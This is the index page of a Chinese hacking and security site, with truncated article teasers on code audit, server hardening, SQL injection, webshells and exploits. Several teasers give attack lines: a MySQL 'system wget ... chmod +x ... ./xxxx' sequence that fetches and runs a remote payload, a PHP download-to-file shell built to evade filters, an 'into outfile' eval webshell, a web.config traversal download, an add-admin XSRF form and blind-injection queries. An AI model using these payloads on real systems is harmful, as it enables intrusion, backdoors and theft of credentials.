技巧_狂人网

php漏洞与代码审计10-21
在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。 1.xss + sql注入      其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一 ...[详情请点击查看]
一些关于linux ftp服务器安全建议01-15
下面说下如何设置debian下的ftp的安全建议    1、建议使用虚拟账户,而且虚拟账户不允许登录终端(/sbin/nologin掉   )   2、ftp密码要复杂些,如果支持ssl一定要开启ssl!   ftp服务不要用root权限启动,否则万一出现个提权0day呢~   建议使 ...[详情请点击查看]
PHP+MySQL环境下SQL Injection攻防总结01-15
作者:老王    程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过。其实当黑客SQL Injection时,同样是一个TDD的过程:他们会先尝试着让程序报错,然后一点一点的修正参数内容,当程序再次运行成 ...[详情请点击查看]
addslashes() Versus mysql_real_escape_string()01-15
Last month, I discussed Google's XSS Vulnerability and provided an example that demonstrates it. I was hoping to highlight why character encoding consistency is important, but apparently the addslashes() versus mysql_real_escape_string() debate continues. Demons ...[详情请点击查看]
MySQL注入中导出字段内容的研究——通过注入导出We 01-15
本文作者:angel文章性质:原创发布日期:2004-09-17 声明:本文已发表在《黑客X档案》,转载请注明。 前言   记得有一些关于利用MySQL获得Shell的文章,说的是得到一个root权限,远程连接并建立一个表,在里面插入Shell的内容,然后利用into outfile导出到相应目录, ...[详情请点击查看]
python的hash冲突攻击exploit01-15
#/usr/bin/python  # to attack hash collision in python # code by joeda@hi.baidu.com 2012-01-05 #  to save as atk.py # python atk.py  40000# .# 42.530313015# *# 0.087562084198 import time, sys MAX = 100000try: &nb ...[详情请点击查看]
浅谈PHP可变变量安全续10-21
Ryat牛在微博上又给出了可变变量的N多例子,有些还真没仔细注意,没想到一个语法特性又牵出了另外一个语法特性,个人觉得这是个BUG。   PHP的可变变量无需2次嵌套,一次就可以执行!如下的例子:   代码花括号内直接就是phpinfo(),phpinfo函数是不会执行的! <?ph ...[详情请点击查看]
浅谈PHP可变变量安全续续10-21
Non alphanumeric code in PHP php/" style="line-height: normal; ">http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/   Tiny PHP Shell http://h.ackack.net/tiny-php-shell.html   这两个东西就是可变变量和回调函数在WEBSHELL上的高级 ...[详情请点击查看]
iptables默认安全规则脚本10-18
默认脚本只开启常规web服务器的80,3306,22端口 #vi default_firewall.sh #!/bin/bash########################################################################### File:         default_firewall.sh# Description:# Language:& ...[详情请点击查看]
linux基本安全配置设置脚本10-18
方便设置一些基本的linux安全设置 #vi autosafe.sh #!/bin/bash########################################################################### File:         autosafe.sh# Description:# Language:     GNU B ...[详情请点击查看]
Linux下mysql5+root 另类提权09-28
mysql5下多了个函数system mysql>system uname -a mysql>system wget http://xxxx.xxx.com/xxxx ; mysql>system chmod +x xxxx; mysql>system ./xxxx;...[详情请点击查看]
utf-7 bom后续08-26
今天tcpper让我帮忙测一个url,结果无意发现微软似乎在某个补丁中针对utf-7 bom 做了些限制。 win7+ie8下测试: ie识别网页的编码顺序 依然是 bom >server content-type中的 charset…… 但如果server content-type中设置了charset,且BOM 为UTF-7的,则以server content-t ...[详情请点击查看]
突破一流拦截的php代码08-26
down_shell.php -可过一流信息拦截 <?php$str=file_get_contents($_GET['url']);echo file_put_contents($_GET['file'],$str);?>use: ?url=http://www.sswowo.com/1.txt&file=3.asp代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后 ...[详情请点击查看]
ValtNet (photogallery.html?id_categoria) 远程sq 08-25
ehsan_hp200 hotmail com################################ IRANIAN THE BEST HACKERS IN THE WORLD ###################################### ######################## Remote SQL injection Vulnerability#### ValtNet (photogallery.html?id_categoria)####################### ...[详情请点击查看]
Concrete CMS 5.4.1.1及更低版本跨站脚本缺陷及修复08-25
YGN Ethical Hacker Group (lists yehg net)Concrete CMS 5.4.1.1 <= Cross Site Scripting 1. 概述 Concrete CMS 5.4.1.1及低版本脚本跨站缺陷 2. 背景 Concrete5 makes running a website easy. Go to any page in your site,and a editing toolbar gives you  ...[详情请点击查看]
Help Request System 1.1g XSRF (加管理账号)缺陷及 08-25
标题: Help Request System 1.1g XSRF (add admin)作者 G13开发网站: http://freehelpdesk.org/测试版本: 1.1g <html><body><form id="edit" method="post"action="http://www.badguest.cn /request/index.php?sub=users&action=store&type=add"encty ...[详情请点击查看]
cuteeditor编辑器利用方法两则08-25
方法1.直接下载load.ashx配置文件 http://www.badguest.cn /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config 然后查看一些sql配置信息 从sql数据库连接入手 <connectionStrings> <add name=”ynncConnectionString” connectionStr ...[详情请点击查看]
Access溢出+跨裤得到shell08-25
最近检测的这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在config.asp里,没FSO根本改不了,Faint.....     我只能围绕这个唯一的注入点展开思考,如 ...[详情请点击查看]
Mysql root导shell06-28
Mysql导shell Select '<?php eval($_POST[cmd]);?>' into outfile 'E:/wwwroot/china/eval.php';//导shell,访问报错,详情不解 select load_file('E:/wwwroot/china/eval.php');//读shell,检查shell完整性 http://www.xxxxxxx.cn/eval.php   经过asc码格式导成功了 ...[详情请点击查看]
MsSql盲注入部分语句06-28
--得到所有库名,因为dbid的值从1到5是系统用的,所以用户自己建的一定是从6开始的。 select * from master.dbo.sysdatabases where dbid>5 --列出test库中所有表名及id=5575058select * from test.dbo.sysobjects where xtype='U' --根据表id,列出该表所有字段select * from ...[详情请点击查看]
12345678910...73